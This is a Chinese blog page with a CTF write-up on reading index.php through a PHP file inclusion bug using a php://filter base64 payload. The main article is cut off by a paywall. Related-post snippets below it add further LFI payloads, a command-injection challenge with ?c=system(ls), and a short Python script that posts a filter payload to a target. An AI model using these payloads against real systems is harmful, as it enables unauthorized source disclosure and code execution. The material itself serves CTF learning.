flag在index里,php://filter协议

最新推荐文章于 2023-10-07 13:10:45 发布
最新推荐文章于 2023-10-07 13:10:45 发布
阅读量778 收藏 1
点赞数
分类专栏: web ctf 文章标签: ctf php协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wssmiss/article/details/88228064
版权
本文介绍了一道涉及PHP文件包含漏洞的CTF题目,通过php://filter协议来读取并解密index.php源码,最终找到flag。解析了php://filter协议的用途,并提供了一个解题实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目连接http://123.206.87.240:8005/post/

题目

在这里插入图片描述
点击之后出现
在这里插入图片描述
地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php类型

解题思路

因为题目提示flag在index里面,但是无法通过查看源码得到有效信息,因此尝试使用php://filter获取源码
构造`http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=./index.php

在这里插入图片描述
得到加密后的index.php的源代码
整理后

最低0.47元/天 解锁文章
CTF】文件包含漏洞-php://filter 流包装器 【详】
2302_79596028的博客
10-23 1719
本文详细介绍了CTF中对于文件包含漏洞可以使用的php://filter流包装器
CTF/CTF练习平台-flagindexphp://filter的利用】
ny18002122997的博客
01-14 436
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样 注意到了传值为http://1...
Bugku——flagindex
王嘟嘟的博客
11-03 1093
0x00 前言 今日份CTF奉上,这到底涉及到的伪协议是真的不懂呀。 题目 0x01 start 我一直都相信就算有什么东西不会,但是请把你能做好的每一点都做好,比如说xxxx这个东西你根本不会,你首先要做的就是把xxxx这个名字的意思查清楚,虽然很蠢,但是也是一中态度。 点开链接进行查看 点一下click me进行尝试。 发现这很明显的提示file=xxxx 知道是文件包含,但是怎么利用...
bugku---flagindex
LuckySec
11-15 481
题目 http://123.206.87.240:8005/post/ 点击试试 可以看到file=show.php 由此想到php://filterPHP中独有的协议是关于php://filter的博客 https://www.leavesongs.com/PENETRATION/php-filter-magic.html 将网址改为 http://123.206.87.240:80...
Bugku:flagindex
foreverzwl
10-22 1798
php文件包含漏洞
BugKu flagindex-知识点
布屿
05-17 386
CTF/CTF练习平台-flagindexphp://filter的利用】 https://blog.csdn.net/wy_97/article/details/77431111 谈一谈php://filter的妙用 https://blog.csdn.net/wy_97/article/details/77432002 ...
bugku-web-flagindex
a3uRa的一个窝
08-22 404
最近好忙啊 不说了,开始题目吧 进入页面 click me?no 点击 发现url变成了 http://120.24.86.145:8005/post/index.php?file=show.php flagindex面 尝试?file=index.php 不行没有任何返回 尝试 ?file=php://filter/convert.base64-encode...
bugku flagindex.php
Superpig的博客
11-09 538
思路 点击链接后,看见参数file=show.php ,典型的本地文件泄露 破解 访问http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php即得index.php的源码的base64编码,解码即可得到flag(在注释) 原理 1、php://...
bugku flagindex
Seaern的博客
07-02 342
题目链接 第二个界面发现url为: http://123.206.87.240:8005/post/index.php?file=show.php 参数有file选项,联想到了文件包含漏洞 结合题目提示: flagindex 通过PHP内置协议直接读取代码 PHP内置协议 通过构造如下语句: http://xxx.com/index.php?file=php://fil...
bugku flagindex
YenKoc的博客
10-20 227
先点进去看看。 看到file,似乎在暗示着我们,php://filter/read/convert.base64-encode/resource=index.php, 这句将index.php内容用base64编码形式显示出来。 自己将结果解码,得出flag...
bugku_web flagindex
didid_w的博客
05-01 624
打开网页:点击之后url变成了:看到?file=show.php在结合题目 flagindex 很容易想到文件包含试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤通过php协议利用PHP://filter/read=c...
bugku web flagindex
thinszx的博客
03-09 299
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php协议php中,有
了解PHP协议
Lemon's blog
05-04 1014
前言:最近做题web题很多都涉及了PHP协议,这次就来详细的了解总结一下! php:// 说明: PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// 访问输入输出流,有许多子协议,下面就来学习一下 (一)php://filter 说明: php://f...
CTFshow_命令执行
qq_45927819的博客
11-20 1377
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
ctfshow php特性 下
weixin_63231007的博客
06-13 1587
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
CTFshow——PHP特性(上)
D.MIND 的博客
02-09 1917
web89——preg_match函数 、数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } preg
PHP协议:使用 php://filter 为数据流应用过滤器
最新发布
两个月亮
10-07 4672
php://filter 的主要作用是提供一种机制,让您可以轻松地在数据流上应用一个或多个过滤器。convert.base64-encode 与 convert.base64-decode 是 php://filter 所支持的过滤器,使用这两个过滤器等同于使用 base64_encode() 与 base64_decode() 对数据流进行处理。在为 php://filter 指定过滤器时,可以通过 管道符 | 指定多个过滤器(过滤器列表),这些过滤器将按照 从左至右 的顺序 依次 对数据流进行处理。
bugkuctf web基础部分 writeup
river
03-20 3010
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
import sys import requests try: HOST = sys.argv[1] PORT = sys.argv[2] except: pass uri = f"http://{HOST}:{PORT}" def upload(): url = uri + '/index.php' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0', } data = {'file':'php://filter/resource=/flag'} response = requests.post(url=url,data=data,headers=headers) print(response.text) upload()
06-10
这段代码是一个 Python 脚本,它会向远程服务器发送 HTTP POST 请求,请求上传一个名为 `php://filter/resource=/flag` 的文件。其中,`HOST` 和 `PORT` 是通过命令行参数传递进来的,如果没有传入,则默认为空。在 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值